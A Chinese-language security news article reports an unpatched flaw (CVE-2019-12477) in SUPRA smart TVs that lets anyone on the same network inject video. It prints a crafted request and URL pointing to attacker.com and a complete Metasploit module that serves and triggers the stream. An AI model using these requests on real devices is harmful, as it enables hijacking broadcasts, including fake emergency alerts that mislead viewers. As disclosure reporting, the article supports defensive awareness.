近期,迪拜安全研究員Dhiraj Mishra 發現,SUPRA智能雲電視存在播放可劫持漏洞(CVE-2019-12477),與SUPRA電視處于同一無線網絡環境中的攻擊者,可向電視裝置僞造播放請求,插播任意視訊内容或虛假廣播消息。
據悉,SUPRA智能雲電視在俄羅斯和東歐地區非常受歡迎,主要通過網上銷售管道銷往俄羅斯、中國和阿聯酋等國。Dhiraj Mishra發現的漏洞問題在于電視流媒體擷取功能 'openLiveURL()',SUPRA電視用它來擷取流媒體的播放内容。Mishra發現,該功能缺乏必要的認證授權和會話管理措施,攻擊者可以通過向一個靜态的URL發送構造請求來觸發漏洞,繞過授權驗證,向播放機制中注入遠端視訊流檔案,播放任意視訊内容。
漏洞細節
Dhiraj Mishra透露,他通過源碼檢查、應用枚舉和請求發送方式最終發現了該漏洞。漏洞接口位于 /remote/media_control?action=setUri&uri=URI服務端,存在漏洞的功能函數為openLiveTV(url),以下為openLiveTV(url)函數源碼片段:
function openLiveTV(url) { $.get("/remote/media_control", {m_action:'setUri',m_uri:url,m_type:'video/*'}, function (data, textStatus){ if("success"==textStatus){ alert(textStatus); }else { alert(textStatus); } }); } 複制
向電視裝置插入任意視訊播放的構造請求:
GET /remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8 HTTP/1.1Host: 192.168.1.155User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1 複制
當然,也可以直接用以下方式向處于同一無線網絡環境中的SUPRA智能電視發起請求,也能實作插播效果:
http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8 複制
雖然發現漏洞已有一段時間,但因為我實在聯系不到SUPRA智能電視供應商,是以一直到現在,這個漏洞也還是未修複狀态。以下POC視訊展示的是SUPRA智能電視在播放喬布斯演講節目時,攻擊者利用上述漏洞,突然插播了僞造的美國國家緊急報警系統消息(Emergency Alert System):
Metasploit msf exploit攻擊子產品
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super(update_info(info, 'Name' => 'Supra Smart Cloud TV Remote File Inclusion', 'Description' => %q{ This module exploits an unauthenticated remote file inclusion which exists in Supra Smart Cloud TV. The media control for the device doesn't have any session management or authentication. Leveraging this, an attacker on the local network can send a crafted request to broadcast a fake video. }, 'Author' => [ 'Dhiraj Mishra', # Discovery, PoC, and module 'wvu' # Module ], 'References' => [ ['CVE', '2019-12477'], ['URL', 'https://www.inputzero.io/2019/06/hacking-smart-tv.html'] ], 'DisclosureDate' => '2019-06-03', 'License' => MSF_LICENSE )) deregister_options('URIPATH') end def run start_service('Path' => '/') print_status("Broadcasting Epic Sax Guy to #{peer}") res = send_request_cgi( 'method' => 'GET', 'uri' => '/remote/media_control', 'encode_params' => false, 'vars_get' => { 'action' => 'setUri', 'uri' => get_uri + 'epicsax.m3u8' } ) unless res && res.code == 200 && res.body.include?('OK') print_error('No doo-doodoodoodoodoo-doo for you') return end # Sleep time calibrated using successful pcap print_good('Doo-doodoodoodoodoo-doo') print_status('Sleeping for 10s serving .m3u8 and .ts files...') sleep(10) end def on_request_uri(cli, request) dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-12477') files = { '/epicsax.m3u8' => 'application/x-mpegURL', '/epicsax0.ts' => 'video/MP2T', '/epicsax1.ts' => 'video/MP2T', '/epicsax2.ts' => 'video/MP2T', '/epicsax3.ts' => 'video/MP2T', '/epicsax4.ts' => 'video/MP2T' } file = request.uri unless files.include?(file) vprint_error("Sending 404 for #{file}") return send_not_found(cli) end data = File.read(File.join(dir, file)) vprint_good("Sending #{file}") send_response(cli, data, 'Content-Type' => files[file]) endend 複制
*本文作者:clouds,轉載請注明來自FreeBuf.COM 複制